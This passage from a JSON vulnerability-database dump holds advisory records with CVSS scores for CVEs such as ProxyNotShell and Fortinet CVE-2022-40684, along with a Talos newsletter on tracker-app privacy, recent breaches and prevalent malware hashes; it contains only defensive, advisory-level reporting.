Dubbed \"ProxyNotShell,\" this vulnerability is chainable with CVE-2022-41040 which allows for the remote code execution.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-30T00:00:00", "type": "cisa_kev", "title": "Microsoft Exchange Server Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-09-30T00:00:00", "id": "CISA-KEV-CVE-2022-41082", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-10-03T06:50:27", "description": "Microsoft Exchange Server allows for server-side request forgery. Dubbed \"ProxyNotShell,\" this vulnerability is chainable with CVE-2022-41082 which allows for remote code execution.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-30T00:00:00", "type": "cisa_kev", "title": "Microsoft Exchange Server Server-Side Request Forgery Vulnerability", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-09-30T00:00:00", "id": "CISA-KEV-CVE-2022-41040", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-09-21T22:49:49", "description": "Trend Micro Apex One and Apex One as a Service contain an 
improper validation of rollback mechanism components that could lead to remote code execution.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-15T00:00:00", "type": "cisa_kev", "title": "Trend Micro Apex One and Apex One as a Service Improper Validation Vulnerability", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-40139"], "modified": "2022-09-15T00:00:00", "id": "CISA-KEV-CVE-2022-40139", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-09-22T20:02:27", "description": "Zoho ManageEngine PAM360, Password Manager Pro, and Access Manager Plus contain an unspecified vulnerability which allows for remote code execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-22T00:00:00", "type": "cisa_kev", "title": "Zoho ManageEngine Multiple Products Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-35405"], "modified": "2022-09-22T00:00:00", "id": "CISA-KEV-CVE-2022-35405", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-10-20T18:52:08", "description": "Zimbra Collaboration (ZCS) allows an attacker to upload arbitrary files using cpio package to gain incorrect access to any other 
user accounts.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-20T00:00:00", "type": "cisa_kev", "title": "Zimbra Collaboration (ZCS) Arbitrary File Upload Vulnerability", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-41352"], "modified": "2022-10-20T00:00:00", "id": "CISA-KEV-CVE-2022-41352", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-08-29T18:46:08", "description": "Apple iOS and macOS contain an out-of-bounds write vulnerability that could allow an application to execute code with kernel privileges.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-08-18T00:00:00", "type": "cisa_kev", "title": "Apple iOS and macOS Out-of-Bounds Write Vulnerability", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-32894"], "modified": "2022-08-18T00:00:00", "id": "CISA-KEV-CVE-2022-32894", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-10-11T22:36:14", "description": "Microsoft Windows COM+ Event System Service contains an unspecified vulnerability that allows for privilege escalation.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", 
"scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-11T00:00:00", "type": "cisa_kev", "title": "Microsoft Windows COM+ Event System Service Privilege Escalation Vulnerability", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-41033"], "modified": "2022-10-11T00:00:00", "id": "CISA-KEV-CVE-2022-41033", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-10-20T20:52:07", "description": "Fortinet FortiOS, FortiProxy, and FortiSwitchManager contain an authentication bypass vulnerability that could allow an unauthenticated attacker to perform operations on the administrative interface via specially crafted HTTP or HTTPS requests.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-11T00:00:00", "type": "cisa_kev", "title": "Fortinet Multiple Products Authentication Bypass Vulnerability", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-40684"], "modified": "2022-10-11T00:00:00", "id": "CISA-KEV-CVE-2022-40684", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-09-28T22:29:33", "description": "A code injection vulnerability in the User Portal and Webadmin of Sophos Firewall allows for remote code execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", 
"attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-23T00:00:00", "type": "cisa_kev", "title": "Sophos Firewall Code Injection Vulnerability", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-3236"], "modified": "2022-09-23T00:00:00", "id": "CISA-KEV-CVE-2022-3236", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}}], "hackread": [{"lastseen": "2022-10-03T06:04:27", "description": "By [Deeba Ahmed](<https://www.hackread.com/author/deeba/>)\n\nThe latest attack against Exchange servers utilizes at least two new flaws (CVE-2022-41040, CVE-2022-41082) that have been assigned CVSS scores of 6.3 and 8.8.\n\nThis is a post from HackRead.com Read the original post: [Microsoft Confirms Two 0-Days Being Exploited Against Exchange Servers](<https://www.hackread.com/microsoft-confirms-0-days-exchange-servers/>)", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-30T17:56:35", "type": "hackread", "title": "Microsoft Confirms Two 0-Days Being Exploited Against Exchange Servers", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-09-30T17:56:35", "id": "HACKREAD:E34C6E8908AE56B0B1176B1237BFDF36", "href": "https://www.hackread.com/microsoft-confirms-0-days-exchange-servers/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-11-28T22:13:45", "description": "By 
[Waqas](<https://www.hackread.com/author/hackread/>)\n\nThe flaw is tracked as CVE-2022-40684 in FortiOS, while its exploit is being sold on a popular Russian hacker forum.\n\nThis is a post from HackRead.com Read the original post: [Critical Flaw Exploited to Bypass Fortinet Products and Compromise Orgs](<https://www.hackread.com/authentication-bypass-flaw-fortinet-products/>)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-11-28T20:17:04", "type": "hackread", "title": "Critical Flaw Exploited to Bypass Fortinet Products and Compromise Orgs", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-40684"], "modified": "2022-11-28T20:17:04", "id": "HACKREAD:2EBD89813F12BF96F813DB942560BD69", "href": "https://www.hackread.com/authentication-bypass-flaw-fortinet-products/", "cvss": {"score": 0.0, "vector": "NONE"}}], "akamaiblog": [{"lastseen": "2022-10-04T22:41:31", "description": "Akamai Security Research has released web application firewall protections for Microsoft Exchange CVE-2022-41040 and CVE-2022-41082.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-03T09:00:00", "type": "akamaiblog", "title": "Akamai?s Response to Zero-Day Vulnerabilities in Microsoft Exchange Server 
(CVE-2022-41040 and CVE-2022-41082)", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-10-03T09:00:00", "id": "AKAMAIBLOG:0287B84AF09C377FDC8D475774722858", "href": "https://www.akamai.com/blog/security-research/akamais-response-zero-day-vulnerabilities-microsoft-exchange-server", "cvss": {"score": 0.0, "vector": "NONE"}}], "checkpoint_advisories": [{"lastseen": "2022-10-04T15:20:24", "description": "A remote code execution vulnerability exists in Microsoft Exchange. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-03T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Exchange Server Remote Code Execution (CVE-2022-41082; CVE-2022-41040)", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-10-04T00:00:00", "id": "CPAI-2022-0628", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-10-24T15:04:13", "description": "A remote code execution vulnerability exists in multiple Zoho products. 
Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-23T00:00:00", "type": "checkpoint_advisories", "title": "Zoho Multiple Products Remote Code Execution (CVE-2022-35405)", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-35405"], "modified": "2022-10-23T00:00:00", "id": "CPAI-2022-0617", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-10-24T15:04:01", "description": "An authentication bypass vulnerability exists in multiple Fortinet products. 
Successful exploitation of this vulnerability would allow remote attackers to gain unauthorized access into the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-23T00:00:00", "type": "checkpoint_advisories", "title": "Fortinet Multiple Products Authentication Bypass (CVE-2022-40684)", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-40684"], "modified": "2022-10-23T00:00:00", "id": "CPAI-2022-0720", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}}], "talosblog": [{"lastseen": "2022-10-06T19:13:58", "description": "[](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjLGV0qm1JxU91RjdxVIuHS5qpDp6eR5oqC3GXE4GKh74vcE6eErdX-odGGmldK4seEV08PmWVUMwC9eHiY-MNvEWPJqq7kEe3k9gjAfn0ai-JRQnZ3GdRiAki_wed_Ctz2-MbeTD591fAVRErXhYumK3_GFcUGqEBUmnA_aeVfgK2rZKQ7AW0eYUiY/s2000/threat-source-newsletter.jpg>)\n\n \n\n\n_By Jon Munshaw. _\n\n[](<https://engage2demand.cisco.com/SubscribeTalosThreatSource>)\n\nWelcome to this week\u2019s edition of the Threat Source newsletter. \n\n \n\n\nAs I [wrote about last week](<https://blog.talosintelligence.com/2022/09/threat-source-newsletter-sept-29-2022.html>), I\u2019ve been [diving a lot into apps\u2019 privacy policies](<https://blog.talosintelligence.com/2022/09/our-current-world-health-care-apps-and.html>) recently. And I was recently made aware of a new type of app I never knew existed \u2014 family trackers. \n\n \n\n\nThere are countless mobile apps for parents to track their children or other family members based on their location, phone usage, and even driving speed. 
As an anxious soon-to-be-parent, this sounds intriguing to me \u2014 it\u2019d be a supped-up version of Find my Friends on Apple devices so I\u2019d never have to ask my teenager (granted, I\u2019m many years away from being at that stage of my life) when they were coming home or where they were. \n\n \n\n\nJust as with all other types of mobile apps, there are pitfalls, though. \n\n \n\n\nLife360, one of the most popular of these types of apps and even tells users what their maximum driving speed was on a given trip, was found in December 2021 to be [selling precise location data](<https://themarkup.org/privacy/2021/12/06/the-popular-family-safety-app-life360-is-selling-precise-location-data-on-its-tens-of-millions-of-user>) on its users, potentially affecting millions of people. Once that precise location data is out there, there is no telling who could eventually get a hold of it. Even if Life360 doesn\u2019t intend to let adversaries see this information, they don\u2019t have direct control over how those third parties handle the information once it\u2019s sold off. \n\n \n\n\nThe [app\u2019s current and updated privacy policy](<https://support.life360.com/hc/en-us/articles/360043228154-Full-Privacy-Policy>) states that it \"may also share location information with our partners, such as Cuebiq and its Partners, for tailored advertising, attribution, analytics, research and other purposes.\u201d However, users do have the ability to opt out of this inside the app. \n\n \n\n\nThere is hardware that offers this same type of tracking. 
Jealous, angry or paranoid spouses and parents have used [Apple\u2019s AirTags in the past to unknowingly track people](<https://www.npr.org/2022/02/18/1080944193/apple-airtags-theft-stalking-privacy-tech>), eventually to the point that Apple had to [address the issue directly](<https://www.apple.com/newsroom/2022/02/an-update-on-airtag-and-unwanted-tracking/>) and provide several updates to AirTags\u2019 security and precise location alerts to make it easier for users to find potentially unwanted AirTags on their cars or personal belongings. \n\n \n\n\nThis is truthfully just an area of concern I had never considered before. Many parents would do anything for their children\u2019s safety, which is certainly understandable. But just like personal health apps, we need to consider the security trade-offs here, too. As we\u2019ve said before, [no one truly has \u201cnothing to hide,\u201d](<https://beerswithtalos.talosintelligence.com/2033817/11128173-beers-with-talos-ep-124-there-s-no-such-thing-as-i-have-nothing-to-hide>) especially when it comes to minors or vulnerable populations. I\u2019m not saying using any of these apps is inherently wrong, or that AirTags do not have their legitimate purposes. But any time we welcome this software and hardware into our homes and on our devices, it\u2019s worth considering what sacrifices we might be making elsewhere. \n\n \n\n\n \n\n\n## The one big thing \n\n[Microsoft warned last week](<https://blog.talosintelligence.com/2022/09/threat-advisory-exchange-server-vulns.html>) of the exploitation of two recently disclosed vulnerabilities collectively referred to as \"ProxyNotShell,\" affecting Microsoft Exchange Servers 2013, 2016 and 2019. One of these vulnerabilities could allow an attacker to execute remote code on the targeted server. Limited exploitation of these vulnerabilities in the wild has been reported. 
CVE-2022-41040 is a Server-Side Request Forgery (SSRF) vulnerability, while CVE-2022-41082 enables Remote Code Execution (RCE) when PowerShell is accessible to the attackers. \n\n> ### Why do I care? \n> \n> Exchange vulnerabilities have become increasingly popular with threat actors, as they can provide initial access to network environments and are often used to facilitate more effective phishing and malspam campaigns. The Hafnium threat actor exploited several zero-day vulnerabilities in Exchange Server in 2021 to deliver ransomware, and Cisco Talos Incident Response reported that the exploitation of Exchange Server issues was one of the four attacks they saw most often last year. \n> \n> ### So now what?\n\n> While no fixes or patches are available yet, Microsoft has [provided mitigations](<https://www.darkreading.com/remote-workforce/microsoft-updates-mitigation-for-exchange-server-zero-days>) for on-premises Microsoft Exchange users on Sept. 29, 2022. Even organizations that use Exchange Online may still be affected if they run a hybrid server. While Microsoft continues to update their mitigations, some security researchers [posit they can be bypassed](<https://twitter.com/GossiTheDog/status/1575813395835547651>). Talos has released several Snort rules to detect the exploitation of these vulnerabilities and associate malware families used in these attacks. \n\n> \n\n## Top security headlines from the week\n\n \n\n\nMore than 2 million Australians\u2019 personal information is at risk after a data breach at telecommunications giant Optus. More than 1.2 million customers have had at least one ID number from a current and valid form of identification, along with other personal data, according to an update from the company\u2019s CEO. Adding to the confusion, the company told many residents in New South Wales that it would need to replace their driver\u2019s license, only to later backtrack to say that would not be the case for everyone affected. 
Optus says it enlisted a third party to complete a thorough review of the compromise to identify security gaps and any other potential fallout. ([ABC News](<https://www.abc.net.au/news/2022-10-03/optus-data-breach-cyber-attack-deloitte-review-audit/101496190>), [Nine News](<https://www.9news.com.au/national/optus-data-breach-update-more-than-two-million-customer-identity-details-exposed/b92b17d9-fc77-430b-94ca-21def7fea61d>)) \n\nThe Vice Society ransomware group leaked more than 500 GB worth of data on employees and students at the unified Los Angeles School District after the district refused to pay a requested extortion payment after a ransomware attack several weeks ago. Officials said the leak was less extensive than originally expected and limited to attendance and academic records from 2013 - 2016. The district declined to pay the ransom because there was no guarantee that the actors would not leak the information anyway. Threat actors have commonly targeted the education sector with ransomware attacks as the school year started and their networks were particularly vulnerable. ([Axios](<https://www.axios.com/2022/10/03/hackers-stolen-data-la-school-district-ransomware>), [Los Angeles Times](<https://www.latimes.com/california/story/2022-10-03/hackers-cyberattack-los-angeles-unified-school-district-hotline-parents-staff-vice-society>)) \n\nThe infamous Lazarus Group threat actor continues to ramp up its activity, recently exploiting open-source software and Dell hardware to target companies all over the globe. A recent report from Microsoft found that the group was impersonating contributors to open-source projects and injecting malicious updates for that software to users. In a separate campaign, the APT also used an exploit in a Dell firmware driver to deliver a Windows rootkit targeting an aerospace company and high-profile journalist in Belgium. 
Lazarus Group is known for operating with North Korean state interests, often stealing cryptocurrency or finding other ways to earn money. ([Bleeping Computer](<https://www.bleepingcomputer.com/news/security/microsoft-lazarus-hackers-are-weaponizing-open-source-software/>), [Security Affairs](<https://securityaffairs.co/wordpress/136623/apt/lazarus-exploit-dell-firmware-driver.html>)) \n\n \n\n\n## Can\u2019t get enough Talos? \n\n * * _[Developer account body snatchers pose risks to the software supply chain](<https://blog.talosintelligence.com/2022/10/developer-account-body-snatchers-pose.html>)_\n * _[Researcher Spotlight: Globetrotting with Yuri Kramarz](<https://blog.talosintelligence.com/2022/10/researcher-spotlight-globetrotting-with.html>)_\n * _[Threat Roundup for Sept. 23 - 30](<https://blog.talosintelligence.com/2022/09/threat-roundup-0923-0930.html>)_\n * _[Talos Takes Ep. #115: An \"insider threat\" doesn't always have to know they're a threat](<https://www.buzzsprout.com/2018149/episodes/11413990>)_\n * _[Cobalt Strike malware campaign targets job seekers](<https://www.techtarget.com/searchsecurity/news/252525560/Cobalt-Strike-malware-campaign-targets-job-seekers>)_\n * _[Government, Union-Themed Lures Used to Deliver Cobalt Strike Payloads](<https://www.infosecurity-magazine.com/news/government-union-lures-used-cobalt/>)_\n \n\n\n## Upcoming events where you can find Talos \n\n \n\n\n**_[Cisco Security Solution Expert Sessions](<https://web.cvent.com/event/f150cd18-061b-4c25-b617-044c50cac855/summary>)_ (Oct. 11 & 13)**\n\nVirtual \n\n \n\n\n**_[GovWare 2022](<https://www.govware.sg/govware/2022/event-info>)_ (Oct. 18 - 20)**\n\nSands Expo & Convention Centre, Singapore \n\n \n\n\n**_[Conference On Applied Machine Learning For Information Security](<https://www.camlis.org/>) _**** (Oct. 
20 - 21)**\n\nSands Capital Management, Arlington, Virginia \n\n \n\n\n## Most prevalent malware files from Talos telemetry over the past week \n\n** \n**\n\n**SHA 256: **[c67b03c0a91eaefffd2f2c79b5c26a2648b8d3c19a22cadf35453455ff08ead0](<https://www.virustotal.com/gui/file/c67b03c0a91eaefffd2f2c79b5c26a2648b8d3c19a22cadf35453455ff08ead0/details>) \n\n**MD5: **8c69830a50fb85d8a794fa46643493b2 \n\n**Typical Filename: **AAct.exe \n\n**Claimed Product: **N/A \n\n**Detection Name: **PUA.Win.Dropper.Generic::1201 \n\n** \n**\n\n**SHA 256: **[e4973db44081591e9bff5117946defbef6041397e56164f485cf8ec57b1d8934](<https://www.virustotal.com/gui/file/e4973db44081591e9bff5117946defbef6041397e56164f485cf8ec57b1d8934/details>)** \n****MD5: **93fefc3e88ffb78abb36365fa5cf857c ** \n****Typical Filename: **Wextract \n**Claimed Product: **Internet Explorer \n**Detection Name: **PUA.Win.Trojan.Generic::85.lp.ret.sbx.tg \n\n \n\n\n**SHA 256: **[58d6fec4ba24c32d38c9a0c7c39df3cb0e91f500b323e841121d703c7b718681](<https://www.virustotal.com/gui/file/58d6fec4ba24c32d38c9a0c7c39df3cb0e91f500b323e841121d703c7b718681/details>) \n\n**MD5: **f1fe671bcefd4630e5ed8b87c9283534 \n\n**Typical Filename: **KMSAuto Net.exe \n\n**Claimed Product: **KMSAuto Net \n\n**Detection Name: **PUA.Win.Tool.Hackkms::1201 \n\n** \n**\n\n**SHA 256: **[e12b6641d7e7e4da97a0ff8e1a0d4840c882569d47b8fab8fb187ac2b475636c](<https://www.virustotal.com/gui/file/e12b6641d7e7e4da97a0ff8e1a0d4840c882569d47b8fab8fb187ac2b475636c/details>)** **\n\n**MD5: **a087b2e6ec57b08c0d0750c60f96a74c\n\n**Typical Filename: **AAct.exe** **\n\n**Claimed Product: **N/A \n\n**Detection Name: **PUA.Win.Tool.Kmsauto::1201 \n\n** \n**\n\n**SHA 256: **[63d543945e33b4b6088dc34d0550213dc73ea6acce248d8353c63039e8fa284f](<https://www.virustotal.com/gui/file/63d543945e33b4b6088dc34d0550213dc73ea6acce248d8353c63039e8fa284f/details>) \n\n**MD5: **a779d230c944ef200bce074407d2b8ff \n\n**Typical Filename: **mediaget.exe** **\n\n**Claimed Product: **MediaGet 
\n\n**Detection Name: **W32.File.MalParent", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-06T18:00:00", "type": "talosblog", "title": "Threat Source newsletter (Oct. 6, 2022) \u2014 Continuing down the Privacy Policy rabbit hole", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-10-06T18:00:00", "id": "TALOSBLOG:12103F398364269083FD96139F0F6562", "href": "http://blog.talosintelligence.com/2022/10/threat-source-newsletter-oct-6-2022.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-10-28T20:49:32", "description": "\n\nAs I [wrote about last week](<https://blog.talosintelligence.com/2022/09/threat-source-newsletter-sept-29-2022.html>), I've been [diving a lot into apps' privacy policies recently](<https://blog.talosintelligence.com/2022/09/our-current-world-health-care-apps-and.html>). And I was recently made aware of a new type of app I never knew existed -- family trackers.\n\nThere are countless mobile apps for parents to track their children or other family members based on their location, phone usage, and even driving speed. 
As an anxious soon-to-be-parent, this sounds intriguing to me -- it'd be a supped-up version of Find my Friends on Apple devices so I'd never have to ask my teenager (granted, I'm many years away from being at that stage of my life) when they were coming home or where they were.\n\nJust as with all other types of mobile apps, there are pitfalls, though.\n\nLife360, one of the most popular of these types of apps and even tells users what their maximum driving speed was on a given trip, was found in December 2021 to be [selling precise location data on its users](<https://themarkup.org/privacy/2021/12/06/the-popular-family-safety-app-life360-is-selling-precise-location-data-on-its-tens-of-millions-of-user>), potentially affecting millions of people. Once that precise location data is out there, there is no telling who could eventually get a hold of it. Even if Life360 doesn't intend to let adversaries see this information, they don't have direct control over how those third parties handle the information once it's sold off.\n\nThe [app's current and updated privacy policy](<https://support.life360.com/hc/en-us/articles/360043228154-Full-Privacy-Policy>) states that it \"may also share location information with our partners, such as Cuebiq and its Partners, for tailored advertising, attribution, analytics, research and other purposes," though users do have the ability to opt out of this inside the app.\n\nThere is hardware that offers this same type of tracking. 
Jealous, angry or paranoid spouses and parents have [used Apple's AirTags in the past to unknowingly track people](<https://www.npr.org/2022/02/18/1080944193/apple-airtags-theft-stalking-privacy-tech>), eventually to the point that Apple had to [address the issue directly](<https://www.apple.com/newsroom/2022/02/an-update-on-airtag-and-unwanted-tracking/>) and provide several updates to AirTags' security and precise location alerts to make it easier for users to find potentially unwanted AirTags on their cars or personal belongings.\n\nThis is truthfully just an area of concern I had never considered before. Many parents would do anything for their children's safety, which is certainly understandable. But just like personal health apps, we need to consider the security trade-offs here, too. As we've said before, [no one truly has "nothing to hide,"](<https://beerswithtalos.talosintelligence.com/2033817/11128173-beers-with-talos-ep-124-there-s-no-such-thing-as-i-have-nothing-to-hide>) especially when it comes to minors or vulnerable populations. I'm not saying using any of these apps is inherently wrong, or that AirTags do not have their legitimate purposes. But any time we welcome this software and hardware into our homes and on our devices, it's worth considering what sacrifices we might be making elsewhere. \n\n\n## The one big thing\n\n[Microsoft warned last week](<https://blog.talosintelligence.com/2022/09/threat-advisory-exchange-server-vulns.html>) of the exploitation of two recently disclosed vulnerabilities collectively referred to as \"ProxyNotShell,\" affecting Microsoft Exchange Servers 2013, 2016 and 2019. One of these vulnerabilities could allow an attacker to execute remote code on the targeted server. Limited exploitation of these vulnerabilities in the wild has been reported. 
